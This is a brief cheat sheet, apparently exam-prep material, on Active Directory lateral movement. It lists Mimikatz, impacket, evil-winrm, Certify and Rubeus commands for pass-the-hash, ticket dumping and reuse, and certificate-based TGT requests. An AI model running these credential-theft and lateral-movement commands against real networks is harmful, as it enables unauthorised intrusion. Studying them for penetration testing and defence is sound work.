Pass the Ticket & Pass the Certificate
Active Directory
Overview
Lateral movement using Kerberos tickets and certificates.
Cheatsheet
Pass the Hash
# Windows
mimikatz: sekurlsa::pth /user:admin /domain:corp /ntlm:HASH   # PTH with Mimikatz
# Linux
impacket-psexec -hashes :HASH user@target   # PTH with PsExec
evil-winrm -i target -u user -H HASH   # PTH with Evil-WinRM
Pass the Ticket
# Export ticket
mimikatz: sekurlsa::tickets /export   # Dump tickets from memory
# Use ticket
export KRB5CCNAME=ticket.ccache   # Set ticket env var
impacket-psexec -k -no-pass user@target   # Auth using Kerberos ticket
Pass the Certificate
# Request cert with Certify
Certify.exe request /ca:CA-SERVER /template:User   # Request certificate
# Convert to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx   # Convert PEM to PFX
# Use with Rubeus
Rubeus.exe asktgt /user:admin /certificate:cert.pfx /ptt   # Request TGT using cert and Pass-the-Ticket
Common Pitfalls
- Tickets expire - check validity
- Need correct SPN for service access
- Clock skew can break Kerberos
Exam Survival Tips
- Use impacket with -k for ticket auth
- Check for AD CS misconfigurations
- Export tickets before session ends